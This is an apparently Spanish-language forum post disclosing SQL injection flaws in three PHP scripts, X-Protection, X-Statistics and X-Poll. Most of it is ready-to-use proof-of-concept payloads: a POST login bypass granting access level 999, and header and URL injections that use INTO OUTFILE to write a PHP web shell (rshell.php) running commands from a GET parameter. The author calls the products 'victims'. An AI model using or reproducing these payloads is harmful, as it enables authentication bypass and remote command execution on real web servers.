Autor
http://members.lycos.co.uk/xscripts03/
Tienen diversos programas, bastante interesantes, sinembargo hay uno llamado:
X-Protection 1.10
Y bueno.. es increiblemente inseguro.
Código:
PoC:
http://www.server.com/protect.php
POST:
username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*
http://www.server.com/protect.php
POST:
username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*
eso te da nivel de acceso 999
Ahora mi segunda victima, de los mismos XScripts:
X-Statistics 1.20
Para guardar estadisticas de un sitio web.
Ahora, en las cabeceras, las modificamos:
Código:
POC:
GET /x-statistics.php HTTP/1.1
Host: www.myhost.com
User-Agent: sOmeStuF' UNION SELECT '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' INTO OUTFILE '/usr/webserver/public_html/rshell.php
GET /x-statistics.php HTTP/1.1
Host: www.myhost.com
User-Agent: sOmeStuF' UNION SELECT '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' INTO OUTFILE '/usr/webserver/public_html/rshell.php
Deberia crear un archivo, llamado rshell.php en /usr/webserver/public_htm
Mi siguiente victima:
X-Poll
Hay multiples bugs.. pero algunos requieren register_globals on, asi que hare uno mas universal:
Código:
http://www.server.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO OUTFILE '/usr/webserver/public_htm/rshell.php
Deberia crear un archivo, llamado rshell.php en /usr/webserver/public_htm
Hay mas bugs, pero estos son los mas sencillos de explotar.
Saludos!!
En línea
